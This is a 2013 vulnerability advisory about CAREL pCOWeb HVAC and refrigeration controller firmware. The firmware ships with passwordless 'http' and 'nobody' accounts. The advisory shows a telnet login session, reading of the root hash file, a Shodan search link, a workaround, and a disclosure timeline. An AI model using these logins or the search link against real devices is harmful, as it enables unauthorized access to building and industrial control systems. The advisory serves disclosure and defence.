Title: CAREL pCOWeb firmware version 1.5.0 and lower passwordless accounts

Author: xistence ( xistence[at]0x90[.]nl )

Software link: http://ksa.carel.com/documents/10451/30816/pCOWeb_1_5_0.zip

Vendor site:
http://www.carel.com/carelcom/web/eng/catalogo/prodotto_dett.jsp?id_mercato=4&id_gamma=39&id_prodotto=350

Shodan: http://www.shodanhq.com/search?q=pCOWeb

Description: CAREL pCOWeb is an interface used in "air-conditioning
controls", "refrigeration controls" and "telemaintenance systems".

Vulnerability: Passwordless accounts



The CAREL pCOWeb firmware version 1.5.0 and lower contains a /etc/passwd
which has the following 2 passwordless accounts:

http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash

Logging in through telnet without a password is possible and it's not
possible to change or see these accounts through the web interface.

The "http" user basicly got access to all files (including /etc/passwd
which contains the hashes for the root user) as it's in almost every group:

$ telnet <ip>

Linux 2.4.21-rmk1 (localhost) (ttya0)


localhost login: http
No directory /usr/http/root!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[http@localhost14:35:47 /]$ id
uid=48(http) gid=48(http)
groups=48(http),200(httpadmin),500(carel),80(update)


Solution (workaround):
Login with telnet and set a password or change the shell from "/bin/bash"
to "/bin/nologin".

[*] 01-25-2013 Contacted vendor
[*] 01-25-2013 Vendor responded that they will release an updated firmware, supplied workaround
[*] 05-22-2013 No updated firmware released, public disclosure